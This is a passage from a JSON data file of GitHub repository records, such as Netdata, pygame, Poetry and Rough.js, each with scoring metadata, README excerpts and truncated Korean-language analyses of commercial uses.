http://inkscape.org/download/?lang=en\nDirect download also at http://sourceforge.net/projects/inkscape/files/\n\nInkscape is free software. No charges apply.\n\n-------------------------------------------------------\nOpening Files\n\n1. Enclosed Inkscape to open all enclosed file types.\n\n2. Open SVG with Illustrator\nIn order to open SVG in AI, please start Adobe Illustrator and open from within Illustrator.\n\n3. Open EPS with Illustrator\nIn order to open EPS in AI, please start Adobe Illustrator and open from within Illustrator.\n","composite_score":0.3001,"license_safety_tag":"unknown"},{"name":"joeljose/Eulerian-Video-Magnification","github_url":"https://github.com/joeljose/Eulerian-Video-Magnification","stars":0,"language":"","license":"unknown","abandonment_months":687,"description":"# Eulerian Video Magnification 상용화 분석\n\n## 왜 보물인가\n일반 카메라로 촬영한 영상에서 육안으로 볼 수 없는 미세한 움직임이나 색상 변화를 증폭시켜 보여주는 기술로, 의료·보안·과학 분야에서 혁신적인 응용이 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 의료 진단 SaaS 서비스**\n병원이나 클리닉에서 환자의 미세한 맥박,","readme_excerpt":"","composite_score":0.3,"license_safety_tag":"unknown"},{"name":"ashray/Eulerian-Video-Magnification","github_url":"https://github.com/ashray/Eulerian-Video-Magnification","stars":0,"language":"","license":"unknown","abandonment_months":687,"description":"# Eulerian Video Magnification 사업화 분석\n\n## 왜 보물인가\n육안으로 볼 수 없는 미세한 움직임을 영상에서 감지하고 증폭해서 보여주는 기술로, 의료·보안·품질검사 등 다양한 분야에서 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **의료 진단 SaaS**: 환자의 혈류, 호흡, 맥박을 일반 카메라로 원격 측정하는 비접촉식 모니","readme_excerpt":"","composite_score":0.3,"license_safety_tag":"unknown"},{"name":"wianoski/esp32_pid","github_url":"https://github.com/wianoski/esp32_pid","stars":2,"language":"C++","license":"unknown","abandonment_months":54,"description":"# ESP32 PID 저장소 분석\n\n## 왜 보물인가\nESP32라는 저렴한 칩으로 정밀한 온도, 속도, 압력 조절이 가능하게 하는 핵심 기술로, 스마트 기기나 산업용 제어 장치의 원가를 대폭 낮출 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 웹 대시보드에서 원격으로 집의 온난방을 자동 조절하는 스마트 홈 제어 플랫폼\n2.","readme_excerpt":"# About #\n\nThe goal of this project is to create super simple yet fully-feature [PID controller](https://en.wikipedia.org/wiki/PID_controller) running on the [TTGO ESP32 microcontroller](https://github.com/Xinyuan-LilyGO/TTGO-T-Display).  The implementation is designed to be extremely flexible, allowing a user to quickly and easily get up and running their choice of imnut and output sennsors/devices.\n\n![](https://bitbucket.org/jason955/esp32_pid/raw/master/img/TTGO.jpg)\n\n### Features ###\n* **Interactive GUI** Settings are fully configurable through GUI\n* **Webserver** - Remote access over Wifi\n* **Charts** - See historical input and output values\n* **Failsafe** - Set default state on bad input\n* **Redundant input** - Use a second sensor to ensure valid input readings\n* **Persistent Settings** - Save settings to EEPROM\n* **Dual PIDs** - Agressive and conservative with configurable operating bands\n* **Manual Override** - Output can be set manually in the GUI\n* **Windowed Output Mode** - ","composite_score":0.3,"license_safety_tag":"unknown"},{"name":"firehol/netdata","github_url":"https://github.com/firehol/netdata","stars":30,"language":"C","license":"GPL-3.0","abandonment_months":0,"description":"# Netdata 저장소 분석\n\n## 왜 보물인가\n컴퓨터의 건강 상태를 실시간으로 시각화하는 모니터링 도구로, 서버 관리자와 IT팀이 시스템 문제를 빠르게 발견할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 기반 서버 모니터링 플랫폼**\n- 기업의 여러 서버를 한 곳에서 관찰하고 관리하는 웹 서비스로 운영\n\n**2. ","readme_excerpt":"<p align=\"center\">\n<a href=\"https://www.netdata.cloud#gh-light-mode-only\">\n  <img src=\"https://www.netdata.cloud/img/readme-images/netdata_readme_logo_light.png\" alt=\"Netdata\" width=\"300\"/>\n</a>\n<a href=\"https://www.netdata.cloud#gh-dark-mode-only\">\n  <img src=\"https://www.netdata.cloud/img/readme-images/netdata_readme_logo_dark.png\" alt=\"Netdata\" width=\"300\"/>\n</a>\n</p>\n<h3 align=\"center\">X-Ray Vision for your infrastructure!</h3>\n<h4 align=\"center\">Every Metric, Every Second. No BS.</h4>\n\n<br />\n<p align=\"center\">\n  <a href=\"https://github.com/netdata/netdata/\"><img src=\"https://img.shields.io/github/stars/netdata/netdata?style=social\" alt=\"GitHub Stars\"></a>\n  <br />\n  <a href=\"https://app.netdata.cloud/spaces/netdata-demo?utm_campaign=github_readme_demo_badge\"><img src=\"https://img.shields.io/badge/Live%20Demo-green\" alt=\"Live Demo\"></a>\n  <a href=\"https://github.com/netdata/netdata/releases/latest\"><img src=\"https://img.shields.io/github/release/netdata/netdata.svg\" alt=\"Latest re","composite_score":0.3,"license_safety_tag":"restricted"},{"name":"aloyisus/euler_vid_mag","github_url":"https://github.com/aloyisus/euler_vid_mag","stars":0,"language":"","license":"unknown","abandonment_months":687,"description":"# euler_vid_mag 저장소 분석\n\n## 왜 보물인가\n영상 품질을 자동으로 개선하거나 분석하는 기술로, 유튜브·틱톡 같은 영상 플랫폼이나 방송사에서 수작업 없이 콘텐츠 질을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개인 크리에이터를 위한 웹 기반 영상 편집/개선 도구 제공\n- **내부 업무 도구**: 방송국이나 영상","readme_excerpt":"","composite_score":0.3,"license_safety_tag":"unknown"},{"name":"xuehuayous/DelegationAdapter","github_url":"https://github.com/xuehuayous/DelegationAdapter","stars":5,"language":"Kotlin","license":"Apache-2.0","abandonment_months":8,"description":"# DelegationAdapter 사업화 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 구조를 간단하게 관리할 수 있게 해주는 도구로, 개발팀의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 저코드/노코드 플랫폼에서 사용자가 복잡한 기능을 쉽게 구성하도록 지원\n2. **내부 업무 도구**: 대규모 엔터프라이즈 소프","readme_excerpt":"# 一种优雅的方式来使用RecyclerView\n\n使得RecyclerView各种情况的多类型条目更简单！\n\n[![License](https://img.shields.io/badge/License%20-Apache%202-337ab7.svg?style=flat-square)](https://www.apache.org/licenses/LICENSE-2.0)\n[![MavenCentral](https://img.shields.io/badge/%20MavenCentral%20-2.1.0-5bc0de.svg?style=flat-square)](https://repo1.maven.org/maven2/com/zwenkai/delegationadapter)\n[![MinSdk](https://img.shields.io/badge/%20MinSdk%20-%2014%2B%20-f0ad4e.svg?style=flat-square)](https://android-arsenal.com/api?level=14)\n\n## 示例图片\n\n<table>\n  <tr>\n    <td>\n    \t<img src=\"https://raw.githubusercontent.com/xuehuayous/DelegationAdapter/master/sample/pic/01.jpg\" width=\"300\" />\n    </td>\n    <td>\n    \t<img src=\"https://raw.githubusercontent.com/xuehuayous/DelegationAdapter/master/sample/pic/02.jpg\" width=\"300\" />\n\t</td>\n\t<td>\n        <img src=\"https://raw.githubusercontent.com/xuehuayous/DelegationAdapter/master/sample/pic/03.jpg\" width=\"300\" />\n    </td>\n  </tr>\n  <tr>\n    <td>\n      <img src=\"https://raw.githubuserconte","composite_score":0.2998,"license_safety_tag":"safe"},{"name":"shotstack/php-demos","github_url":"https://github.com/shotstack/php-demos","stars":5,"language":"","license":"unknown","abandonment_months":25,"description":"# Shotstack PHP Demos 분석\n\n## 왜 보물인가\n동영상을 자동으로 만들고 편집할 수 있는 기술을 배우고 테스트할 수 있는 실제 예제 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소셜미디어 자동 영상 생성 플랫폼 (인스타그램, 틱톡 콘텐츠 자동 제작)\n2. **내부 업무 도구**: 회사 뉴스레터나 보고서를 자동으로 ","readme_excerpt":"# Shotstack PHP Examples\n\n### Video examples\n\n- **text.php** -\n    Create a HELLO WORLD video title against black background with a zoom in motion effect and soundtrack.\n\n- **images.php** -\n    Takes an array of image URLs and creates a video with a soundtrack and simple zoom in effect.\n\n- **titles.php** -\n    Create a video to demo titles using the available preset font styles, a soundtrack, zoom in motion effect and \n    wipe right transition.\n\n- **trim.php** -\n    Trim the start and end of a video clip to output a shortened video.\n    \n- **filters.php** -\n    Applies filters to a video clip, including a title with the name of the filter and a soundtrack.\n\n- **captions.php** -\n    Parse an SRT transcript file and apply the captions to a video.\n\n- **layers.php** -\n    Layer a title over a background video using tracks. The title includes a zoom effect and is semi-transparent.\n\n- **luma.php** -\n    Create animated transition effects using a luma matte and the luma matte asset type.\n\n- ","composite_score":0.2996,"license_safety_tag":"unknown"},{"name":"fossasia/2013.fossasia.org","github_url":"https://github.com/fossasia/2013.fossasia.org","stars":12,"language":"HTML","license":"unknown","abandonment_months":25,"description":"# fossasia/2013.fossasia.org 분석 보고서\n\n## 왜 보물인가\n2013년 FOSS Asia 행사의 공식 웹사이트 저장소로, 오픈소스 커뮤니티의 역사적 자산이자 이벤트 웹사이트 구축 참고 자료로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **컨퍼런스 웹사이트 SaaS**: 기술 행사 주최자들이 자신의 행사 홍보 페이지를 쉽게 ","readme_excerpt":"","composite_score":0.2996,"license_safety_tag":"unknown"},{"name":"pygame/pygame","github_url":"https://github.com/pygame/pygame","stars":5,"language":"C","license":"unknown","abandonment_months":7,"description":"# Pygame 저장소 분석\n\n## 왜 보물인가\n게임이나 인터랙티브 애플리케이션을 쉽게 만들 수 있는 파이썬 기반 도구로, 진입장벽이 낮으면서도 전문적인 결과물을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 게임 플랫폼**\n- 교육용 게임, 코딩 학습 플랫폼으로 구독형 서비스 제공\n\n**2. 기업 교육 도구**\n- 직원 역량 강화용 인","readme_excerpt":".. image:: https://raw.githubusercontent.com/pygame/pygame/main/docs/reST/_static/pygame_logo.svg\n  :alt: pygame\n  :target: https://www.pygame.org/\n\n\n|AppVeyorBuild| |PyPiVersion| |PyPiLicense|\n|Python3| |GithubCommits| |BlackFormatBadge|\n\nPygame_ is a free and open-source cross-platform library\nfor the development of multimedia applications like video games using Python.\nIt uses the `Simple DirectMedia Layer library`_ and several other\npopular libraries to abstract the most common functions, making writing\nthese programs a more intuitive task.\n\n`We need your help`_ to make pygame the best it can be!\nNew contributors are welcome.\n\n\nInstallation\n------------\n\nBefore installing pygame, you must check that Python is installed\non your machine. To find out, open a command prompt (if you have\nWindows) or a terminal (if you have MacOS or Linux) and type this:\n::\n\n   python --version\n\n\nIf a message such as \"Python 3.8.10\" appears, it means that Python\nis correctly installed. If an error messag","composite_score":0.2995,"license_safety_tag":"unknown"},{"name":"fossasia/lxlauncher-vala","github_url":"https://github.com/fossasia/lxlauncher-vala","stars":12,"language":"Vala","license":"unknown","abandonment_months":25,"description":"# fossasia/lxlauncher-vala 분석 보고서\n\n## 왜 보물인가\n저사양 컴퓨터에서도 빠르게 작동하는 간단한 프로그램 실행 도구로, 오래된 기기를 살리거나 개발도상국의 컴퓨터 활용성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **학교·도서관 IT 관리 서비스**: 낡은 컴퓨터실을 효율적으로 운영하는 유지보수 도구로 판매\n2. **개","readme_excerpt":"To try lxlauncher, type:\n./compile-project.sh\nlxlauncher will be compiled and launched.\nat the moment there is no build system.\n","composite_score":0.2995,"license_safety_tag":"unknown"},{"name":"fogleman/primitive","github_url":"https://github.com/fogleman/primitive","stars":16,"language":"Go","license":"mit","abandonment_months":22,"description":"# fogleman/primitive 분석\n\n## 왜 보물인가\n사진을 간단한 도형들로 변환하여 독특한 예술 작품을 만드는 오픈소스 도구로, 창의적인 시각 효과가 필요한 다양한 분야에서 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 이미지 생성 SaaS**: 사용자가 업로드한 사진을 미니멀한 아트 스타일로 변환해주는 웹 서비스로 월 구독 판","readme_excerpt":"# Primitive Pictures\n\nReproducing images with geometric primitives.\n\n![Example](https://www.michaelfogleman.com/static/primitive/examples/16550611738.200.128.4.5.png)\n\n### How it Works\n\nA target image is provided as input. The algorithm tries to find the single most optimal shape that can be drawn to minimize the error between the target image and the drawn image. It repeats this process, adding *one shape at a time*. Around 50 to 200 shapes are needed to reach a result that is recognizable yet artistic and abstract.\n\n### Primitive for macOS\n\nNow available as a native Mac application!\n\nhttps://primitive.lol/\n\n### Twitter\n\nFollow [@PrimitivePic](https://twitter.com/PrimitivePic) on Twitter to see a new primitive picture every 30 minutes!\n\nThe Twitter bot looks for interesting photos using the Flickr API, runs the algorithm using randomized parameters, and\nposts the picture using the Twitter API.\n\nYou can tweet a picture to the bot and it will process it for you.\n\n### Command-line Usage\n","composite_score":0.2995,"license_safety_tag":"safe"},{"name":"OpnTec/opentechsummit.github.io","github_url":"https://github.com/OpnTec/opentechsummit.github.io","stars":12,"language":"CSS","license":"unknown","abandonment_months":25,"description":"# OpnTec/opentechsummit.github.io 분석 보고서\n\n## 왜 보물인가\n기술 행사와 커뮤니티 정보를 한곳에서 관리할 수 있는 웹사이트 기반 플랫폼으로, 기술 커뮤니티의 성장을 촉진하는 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기술 행사 플랫폼 SaaS**\n- 스타트업, 대학, 개발자 커뮤니티가 자체 컨퍼런스나 밋업을 쉽게 개","readme_excerpt":"","composite_score":0.2995,"license_safety_tag":"unknown"},{"name":"fossasia/libregraphics.asia","github_url":"https://github.com/fossasia/libregraphics.asia","stars":11,"language":"HTML","license":"unknown","abandonment_months":25,"description":"# LibreGraphics.Asia 저장소 분석\n\n## 왜 보물인가\n아시아 지역의 그래픽 디자인 오픈소스 커뮤니티를 연결하는 허브로, 무료 디자인 도구와 교육 자료를 한곳에 모아 디자인 진입장벽을 낮추는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **디자인 교육 플랫폼**: 온라인 강좌 제공 서비스에서 오픈소스 도구 튜토리얼과 연동하여 학생들에게 무","readme_excerpt":"","composite_score":0.2994,"license_safety_tag":"unknown"},{"name":"Snailclimb/springboot-integration-examples","github_url":"https://github.com/Snailclimb/springboot-integration-examples","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":4,"description":"# Snailclimb/springboot-integration-examples 분석\n\n## 왜 보물인가\n스프링부트라는 인기 있는 프레임워크를 다양한 서비스와 연결하는 실제 사용 예제를 모아놓은 학습 자료로, 개발자들이 새로운 기술을 빠르게 배울 수 있는 지름길입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 통합 플랫폼 SaaS**\n여러 업무 시스템(","readme_excerpt":"👍推荐[2021最新实战项目源码下载](https://mp.weixin.qq.com/s?__biz=Mzg2OTA0Njk0OA==&mid=100018862&idx=1&sn=858e00b60c6097e3ba061e79be472280&chksm=4ea1856579d60c73224e4d852af6b0188c3ab905069fc28f4b293963fd1ee55d2069fb229848#rd)\n\n👍[《JavaGuide 面试突击版》PDF 版本](#公众号) 。[图解计算机基础 PDF 版](#优质原创PDF资源)\n\n书单已经被移动到[awesome-cs](https://github.com/CodingDocs/awesome-cs) 这个仓库。\n\n\n\n\n<p align=\"center\">\n<a href=\"https://github.com/Snailclimb/springboot-guide\" target=\"_blank\">\n\t<img src=\"https://my-blog-to-use.oss-cn-beijing.aliyuncs.com/2019-7/spring-boot-guide.png\" width=\"\"/>\n</a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://snailclimb.gitee.io/springboot-guide \"><img src=\"https://img.shields.io/badge/阅读-read-brightgreen.svg\" alt=\"阅读\"></a>\n  <a href=\"#联系我\"><img src=\"https://img.shields.io/badge/chat-微信群-blue.svg\" alt=\"微信群\"></a>\n  <a href=\"#公众号\"><img src=\"https://img.shields.io/badge/%E5%85%AC%E4%BC%97%E5%8F%B7-JavaGuide-lightgrey.svg\" alt=\"公众号\"></a>\n  <a href=\"#公众号\"><img src=\"https://img.shields.io/badge/PDF-Java面试突击-impor","composite_score":0.2991,"license_safety_tag":"safe"},{"name":"clauderic/react-infinite-calendar","github_url":"https://github.com/clauderic/react-infinite-calendar","stars":5,"language":"JavaScript","license":"mit","abandonment_months":23,"description":"# react-infinite-calendar 상품화 분석\n\n## 왜 보물인가\n무한으로 스크롤되는 캘린더 UI를 쉽게 만들 수 있어서, 여행 예약·병원 예약 같은 날짜 선택이 많은 서비스들이 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **숙박 예약 SaaS**: 항공권·호텔 예약 플랫폼에서 부드러운 캘린더 경험으로 전환율 향상","readme_excerpt":"<div align=\"center\">\n<img src=\"https://raw.githubusercontent.com/clauderic/react-infinite-calendar/master/.github/logo.png\" width=\"180\"/>\n</div>\n\n# React Infinite Calendar\n**Currently looking for maintainers to help maintain this project, please reach out if you would be interested**\n\n[![npm version](https://img.shields.io/npm/v/react-infinite-calendar.svg)](https://www.npmjs.com/package/react-infinite-calendar)\n[![downloads](https://img.shields.io/npm/dm/react-infinite-calendar.svg)](https://www.npmjs.com/package/react-infinite-calendar)\n[![license](https://img.shields.io/github/license/mashape/apistatus.svg?maxAge=2592000)](https://github.com/clauderic/react-infinite-calendar/blob/master/LICENSE)\n[![Gitter](https://badges.gitter.im/clauderic/react-infinite-calendar.svg)](https://gitter.im/clauderic/react-infinite-calendar)\n### Examples available here: <a href=\"#\">http://clauderic.github.io/react-infinite-calendar/</a>\n\nFeatures\n---------------\n\n* **Infinite scroll** – Just keep scrol","composite_score":0.299,"license_safety_tag":"safe"},{"name":"MatthewYork/DateTools","github_url":"https://github.com/MatthewYork/DateTools","stars":5,"language":"Objective-C","license":"mit","abandonment_months":21,"description":"# DateTools 상용화 분석\n\n## 왜 보물인가\n스마트폰이나 웹 서비스에서 날짜와 시간을 다루는 복잡한 계산을 자동으로 처리해주는 핵심 도구로, 개발자들이 반복적으로 만들어야 하는 부분을 미리 완성해둔 것입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 예약 관리 SaaS** - 병원, 미용실, 스포츠센터 예약 시스템에서 날짜 자동 계산과 중복 예약 방지","readme_excerpt":"![Banner](https://raw.githubusercontent.com/MatthewYork/Resources/master/DateTools/DateToolsHeader2.png)\n\n## DateTools\n\nDateTools was written to streamline date and time handling in iOS. Classes and concepts from other languages served as an inspiration for DateTools, especially the [DateTime](http://msdn.microsoft.com/en-us/library/system.datetime(v=vs.110).aspx) structure and [Time Period Library](http://www.codeproject.com/Articles/168662/Time-Period-Library-for-NET) for .NET. Through these classes and others, DateTools removes the boilerplate required to access date components, handles more nuanced date comparisons, and serves as the foundation for entirely new concepts like Time Periods and their collections.\n\n[![Build Status](https://travis-ci.org/MatthewYork/DateTools.svg?branch=master)](https://travis-ci.org/MatthewYork/DateTools)\n[![CocoaPods](https://cocoapod-badges.herokuapp.com/v/DateTools/badge.png)](http://cocoapods.org/?q=datetools)\n[![CocoaPods](https://cocoapod-badges.","composite_score":0.2988,"license_safety_tag":"safe"},{"name":"Bonfida/token-vesting","github_url":"https://github.com/Bonfida/token-vesting","stars":286,"language":"Rust","license":"NOASSERTION","abandonment_months":23,"description":"","readme_excerpt":"","composite_score":0.2988,"license_safety_tag":"unknown"},{"name":"popperjs/popper.js","github_url":"https://github.com/popperjs/popper.js","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":3,"description":"# Popper.js 상용화 분석 보고서\n\n## 왜 보물인가\n웹사이트의 팝업, 툴팁, 드롭다운 메뉴 등을 자동으로 올바른 위치에 배치해주는 기술로, 수많은 웹서비스가 이미 사용 중인 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 관리 시스템(CRM)이나 프로젝트 관리 도구에서 팝업 가이드를 정확히 배치하는 기능\n- **내부","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://github.com/floating-ui/floating-ui/blob/master/website/assets/floating-ui-banner.png\" alt=\"Floating UI\" width=\"70%\">\n<p>\n\n> [!NOTE]\n> Popper is now Floating UI! For Popper v2, visit\n> [its dedicated branch](https://github.com/floating-ui/floating-ui/tree/v2.x) and [its documentation](https://popper.js.org/docs).\n> For help on migrating, check out the\n> [Migration Guide.](https://floating-ui.com/docs/migration)\n\n[Floating UI](https://floating-ui.com) is a small library that helps you create\n\"floating\" elements such as tooltips, popovers, dropdowns, and more.\n\nIt offers two main features:\n\n1. **Anchor positioning**: Anchor a floating element (such as a tooltip) to\n   another element (such as a button) while simultaneously ensuring it stays in\n   view as best as possible by avoiding collisions. This feature is available\n   for all platforms.\n2. **User interactions for React**: Hooks and components for composing\n   interactions to create accessible fl","composite_score":0.2984,"license_safety_tag":"safe"},{"name":"maruel/panicparse","github_url":"https://github.com/maruel/panicparse","stars":7,"language":"Go","license":"apache-2.0","abandonment_months":15,"description":"# panicparse 저장소 분석\n\n## 왜 보물인가\n프로그램이 예기치 않게 멈출 때 발생하는 복잡한 오류 메시지를 읽기 쉽게 정리해주는 도구로, 개발자들의 문제 해결 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 모니터링 플랫폼**: 클라우드 서비스 제공 업체들이 고객 애플리케이션의 오류를 시각적으로 분석하고 보고하는 기","readme_excerpt":"# panicparse\n\nParses panic stack traces, densifies and deduplicates goroutines with similar\nstack traces. Helps debugging crashes and deadlocks in heavily parallelized\nprocess.\n\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/maruel/panicparse/v2/stack)](https://pkg.go.dev/github.com/maruel/panicparse/v2/stack)\n[![codecov](https://codecov.io/gh/maruel/panicparse/branch/main/graph/badge.svg?token=izj1cLjUi3)](https://codecov.io/gh/maruel/panicparse)\n[![go-recipes](https://raw.githubusercontent.com/nikolaydubina/go-recipes/main/badge.svg?raw=true)](https://github.com/nikolaydubina/go-recipes#-pretty-print-panic-messages)\n\n\npanicparse helps make sense of Go crash dumps:\n\n![Screencast](https://raw.githubusercontent.com/wiki/maruel/panicparse/parse.gif \"Screencast\")\n\n\n## Features\n\n   * Race detector support, e.g. it can parse output produced by `go test -race`\n   * HTML export.\n   * Easy to use as an [HTTP Handler\n     middleware](https://pkg.go.dev/github.com/maruel/panicparse/v2/stack#ex","composite_score":0.2981,"license_safety_tag":"safe"},{"name":"sdispater/poetry","github_url":"https://github.com/sdispater/poetry","stars":7,"language":"Python","license":"MIT","abandonment_months":0,"description":"# Poetry 저장소 분석\n\n## 왜 보물인가\n프로젝트의 복잡한 설정을 자동으로 관리해주는 도구로, 개발자들이 실제 작업에 더 많은 시간을 쓸 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀을 위한 프로젝트 관리 플랫폼으로 구독형 웹 서비스 제공\n2. **내부 업무 도구**: 대규모 개발 조직의 여러 프로젝트를 일괄 관","readme_excerpt":"# Poetry: Python packaging and dependency management made easy\n\n[![Poetry](https://img.shields.io/endpoint?url=https://python-poetry.org/badge/v0.json)](https://python-poetry.org/)\n[![Stable Version](https://img.shields.io/pypi/v/poetry?label=stable)][PyPI Releases]\n[![Pre-release Version](https://img.shields.io/github/v/release/python-poetry/poetry?label=pre-release&include_prereleases&sort=semver)][PyPI Releases]\n[![Python Versions](https://img.shields.io/pypi/pyversions/poetry)][PyPI]\n[![Download Stats](https://img.shields.io/pypi/dm/poetry)](https://pypistats.org/packages/poetry)\n[![Discord](https://img.shields.io/discord/487711540787675139?logo=discord)][Discord]\n\nPoetry helps you declare, manage and install dependencies of Python projects,\nensuring you have the right stack everywhere.\n\n![Poetry Install](https://raw.githubusercontent.com/python-poetry/poetry/main/assets/install.gif)\n\nPoetry replaces `setup.py`, `requirements.txt`, `setup.cfg`, `MANIFEST.in` and `Pipfile` with a si","composite_score":0.2978,"license_safety_tag":"safe"},{"name":"reactstrap/reactstrap","github_url":"https://github.com/reactstrap/reactstrap","stars":5,"language":"JavaScript","license":"mit","abandonment_months":20,"description":"# Reactstrap 분석 보고서\n\n## 왜 보물인가\n웹사이트를 예쁘고 빠르게 만들기 위한 디자인 부품 모음으로, 전 세계 개발자들이 일관되게 사용하고 있는 표준 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 기업용 관리 대시보드, 데이터 분석 도구 등 업무용 웹 애플리케이션 개발 비용 단축\n\n**2. 내부 업무 도구**\n- 회","readme_excerpt":"[![reactstrap](https://cloud.githubusercontent.com/assets/399776/13906899/1de62f0c-ee9f-11e5-95c0-c515fee8e918.png)](https://reactstrap.github.io)\n\n[![NPM Version](https://img.shields.io/npm/v/reactstrap.svg?branch=master)](https://www.npmjs.com/package/reactstrap) [![Build Status](https://github.com/reactstrap/reactstrap/actions/workflows/test.yml/badge.svg?branch=master)](https://github.com/reactstrap/reactstrap) [![Coverage Status](https://coveralls.io/repos/github/reactstrap/reactstrap/badge.svg?branch=master)](https://coveralls.io/github/reactstrap/reactstrap?branch=master) [![License](https://img.shields.io/npm/l/reactstrap.svg)](https://github.com/reactstrap/reactstrap/blob/master/LICENSE)\n\n# reactstrap\n\nStateless React Components for Bootstrap 5.\n\nIf you're using Bootstrap 4, you'll need to use [Reactstrap v8](https://deploy-preview-2356--reactstrap.netlify.app/)\n\n## Getting Started\n\nFollow the [create-react-app instructions](https://create-react-app.dev/docs/getting-started) t","composite_score":0.2977,"license_safety_tag":"safe"},{"name":"nefe/You-Dont-Need-jQuery","github_url":"https://github.com/nefe/You-Dont-Need-jQuery","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":3,"description":"# You-Dont-Need-jQuery 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 꼭 필요했던 도구를 이제는 더 간단하게 쓸 수 있다는 걸 보여주는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 교육 플랫폼**: 초급 개발자를 위한 온라인 강좌나 튜토리얼 서비스로 월 구독 모델 운영\n2. **기업 개발팀 내부 도구**: 회사의 개발자들","readme_excerpt":"## You (Might) Don't Need jQuery\n\nFrontend environments evolve rapidly nowadays and modern browsers have already implemented a great deal of DOM/BOM APIs which are good enough for production use. We don't have to learn jQuery from scratch for DOM manipulation or event handling. In the meantime, thanks to the spread of frontend libraries such as React, Angular and Vue, manipulating the DOM directly becomes anti-pattern, so that jQuery usage has never been less important. This project summarizes most of the alternatives in native Javascript implementation to jQuery methods, with IE 10+ support.\n\nℹ️ Notice: \n1. jQuery is still a great library and has many valid use cases. Don’t migrate away if you don’t want to!\n2. The alternatives are not completely equivalent in all scenarios, and it is recommended that you test it before using it.\n\n## Table of Contents\n\n1. [Translations](#translations)\n1. [Query Selector](#query-selector)\n1. [CSS & Style](#css--style)\n1. [DOM Manipulation](#dom-manipul","composite_score":0.2974,"license_safety_tag":"safe"},{"name":"the-control-group/voyager","github_url":"https://github.com/the-control-group/voyager","stars":7,"language":"PHP","license":"mit","abandonment_months":16,"description":"# Voyager 저장소 분석\n\n## 왜 보물인가\n자동으로 웹 서비스를 제어하고 관리할 수 있는 기술로, 반복적인 업무 자동화가 필요한 모든 비즈니스에 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 업무 자동화 플랫폼으로 고객사의 반복 작업을 자동 처리\n- **내부 업무 도구**: 회사 내 데이터 수집, 보고서 자동 생성","readme_excerpt":"<p align=\"center\"><a href=\"https://voyager.devdojo.com\" target=\"_blank\"><img width=\"400\" src=\"https://s3.amazonaws.com/thecontrolgroup/voyager.png\"></a></p>\n\n> [!Warning]\n> We have decided to archive Voyager as there are many more modern options available. You may still use Voyager, but it will not be receiving any more updates. Here are some alternatives that we recommend:\n\n- [Wave SaaS Starter Kit](https://devdojo.com/wave)\n- [FilamentPHP Admin Panel & More](https://filamentphp.com)\n- [Genesis Starter Kit](https://github.com/thedevdojo/genesis)\n\nOf course, you may also wish to reach for Laravels admin panel [Nova](https://nova.laravel.com/), or you may want to reach for one of their many [Starter Kits](https://laravel.com/docs/starter-kits).\n\nThanks for all the wonderful times 🕺\n\n> Voyager is built with Vue and Bootstrap. If you are looking for a Laravel Starter Kit built that uses Livewire and Tailwind, you may be interested in checking out [Genesis](https://github.com/thedevdojo/ge","composite_score":0.2973,"license_safety_tag":"safe"},{"name":"pshihn/rough","github_url":"https://github.com/pshihn/rough","stars":6,"language":"HTML","license":"mit","abandonment_months":22,"description":"# Rough 저장소 분석\n\n## 왜 보물인가\n손으로 그린 듯한 스케치 스타일의 그래픽을 웹사이트나 앱에 간단히 추가할 수 있는 기술로, 현대적이고 차갑게 느껴지는 디지털 인터페이스에 친근하고 따뜻한 감성을 더할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 교육 플랫폼**: 온라인 강의나 학습 도구에서 손그림 스타일의 다이어그램과 아이콘을 사용","readme_excerpt":"# Rough.js\n\n<b>Rough.js</b> is a small (\\<9 kB) graphics library that lets you draw in a _sketchy_, _hand-drawn-like_, style.\nThe library defines primitives to draw lines, curves, arcs, polygons, circles, and ellipses. It also supports drawing [SVG paths](https://developer.mozilla.org/en-US/docs/Web/SVG/Tutorial/Paths).\n\nRough.js works with both [Canvas](https://developer.mozilla.org/en-US/docs/Web/API/Canvas_API) and [SVG](https://developer.mozilla.org/en-US/docs/Web/SVG).\n\n![Rough.js sample](https://roughjs.com/images/cap_demo.png)\n\n[@RoughLib](https://twitter.com/RoughLib) on Twitter.\n\n## Install\n\nfrom npm:\n\n```\nnpm install --save roughjs\n```\n\nOr get the latest using unpkg: https://unpkg.com/roughjs@latest/bundled/rough.js\n\n\nIf you are looking for bundled version in different formats, the npm package will have these in the following locations:\n\nCommonJS: `roughjs/bundled/rough.cjs.js`\n\nESM: `roughjs/bundled/rough.esm.js`\n\nBrowser IIFE: `roughjs/bundled/rough.js`\n\n\n## 